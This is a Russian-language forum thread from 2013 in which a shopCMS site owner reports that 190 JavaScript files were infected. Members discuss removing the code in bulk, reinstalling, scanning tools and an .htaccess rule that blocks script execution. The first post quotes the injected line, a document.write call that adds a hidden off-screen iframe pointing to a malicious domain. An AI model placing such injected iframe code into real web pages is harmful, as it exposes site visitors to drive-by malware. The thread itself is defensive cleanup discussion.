Сегодня друг полез смотреть сайт на shopCMS 3.1.2
и говорит что Касперский детектирует вредоносную ссылку типа giverwould.ru
Я проверил сайт как на хостинге так и локально чем мог (благо есть чем проверять) так вот ничего я не нашел но вот в 190 файлах и только *.js
document.write('<iframe height="100" width="100" style="position:absolute;left:-1000px;top:0;" src="http://giverwould.ru...ault"></iframe>');
1
Касперский находит левые ссылки в скриптах
Автор mailomsk, Mar 21 2013 06:09 PM
Сообщений в теме: 6
#1
-
- Assistent vsupport.club
-
- 135 сообщений
Продвинутый пользователь
Репутация: 0
Начинающий
- ГородОмск
Отправлено 21 March 2013 - 06:09 PM
#2
-
- Assistent vsupport.club
-
- 5075 сообщений
Продвинутый пользователь
Репутация: 786
Мастер
Отправлено 21 March 2013 - 06:39 PM
Если Вы хотели задать вопрос, то явно забыли это сделать 
.
.
http://cpu.badisoft.ru (тестовый сайт), http://badisoft.ru (модули)
#3
-
- Assistent vsupport.club
-
- 135 сообщений
Продвинутый пользователь
Репутация: 0
Начинающий
- ГородОмск
Отправлено 21 March 2013 - 06:47 PM
Прошу прощенья! Да действительно забыл задать вопрос!
Как можно скопом Удалить данную бяку? И как мне самостоятельно проверить сайт так как сервисы молчат (ничего не находят.) Ставить касперского не очень хочется!
Как можно скопом Удалить данную бяку? И как мне самостоятельно проверить сайт так как сервисы молчат (ничего не находят.) Ставить касперского не очень хочется!
#4
-
- Assistent vsupport.club
-
- 5075 сообщений
Продвинутый пользователь
Репутация: 786
Мастер
Отправлено 21 March 2013 - 09:18 PM
Никак. Если не хочется ставить Касперского (который, видимо, это умеет удалять?), то придется проделать все то же самое вручную. Работа не сложная, но муторная. Если левый код в ява-скриптах везде один и тот же, то при таком количестве файлов (190) я бы не в ручную корячился, а написал бы скрипт, удаляющий из всех файлов этот "один и тот же" текст.Как можно скопом Удалить данную бяку?
http://cpu.badisoft.ru (тестовый сайт), http://badisoft.ru (модули)
#5
-
- Assistent vsupport.club
-
- 135 сообщений
Продвинутый пользователь
Репутация: 0
Начинающий
- ГородОмск
Отправлено 22 March 2013 - 04:47 AM
1-Скопировал весь сайт локально и через Notepad++ (найти и заменить) все грохнул.
потом как оазалось на хостинге еще вели какие то работы (что потом еще 4 сайта были заражены) но через час все нормализовалось и (гада) уже небыло.
А Как вернуть редактор визуальный (стандартный) а то у меня Краткое и подробное описание перестало работать! В Админке включен но не пашет!
Пробовал откатиться на 1 месяц назад не пашет!
ничего не понимаю!
1-установил с нуля shopcms восстановил БД и копирнул все файлы, Все работает!
потом как оазалось на хостинге еще вели какие то работы (что потом еще 4 сайта были заражены) но через час все нормализовалось и (гада) уже небыло.
А Как вернуть редактор визуальный (стандартный) а то у меня Краткое и подробное описание перестало работать! В Админке включен но не пашет!
Пробовал откатиться на 1 месяц назад не пашет!
ничего не понимаю!
1-установил с нуля shopcms восстановил БД и копирнул все файлы, Все работает!
#6
-
- Assistent vsupport.club
-
- 25 сообщений
Пользователь
Репутация: 0
Начинающий
Отправлено 22 March 2013 - 08:29 AM
еще в помощь в борьбе с shell, взломами и т.д. http://www.revisium.com/ai/ отличный инструмент
#7
-
- Пользователи
-
- 36 сообщений
Продвинутый пользователь
Репутация: 1
Начинающий
Отправлено 24 March 2013 - 07:21 AM
здравствуйте сегодня столкнулся с аналогичной проблемой, только я перепроверил на 2 х антивирусах, действительно поменялись все файлы js видно даже по размеру файлов, сразу напрашивается как защитится от такой фигни кто вкурсе? раскажите, пока на ум приходит поменять права в папке и положить файл htacces с содержанием
<Files ~ "\.(php|php3|php4|php5|phtml|pl|cgi)$">
order deny,allow
deny from all
</Files>
<Files ~ "\.(php|php3|php4|php5|phtml|pl|cgi)$">
order deny,allow
deny from all
</Files>
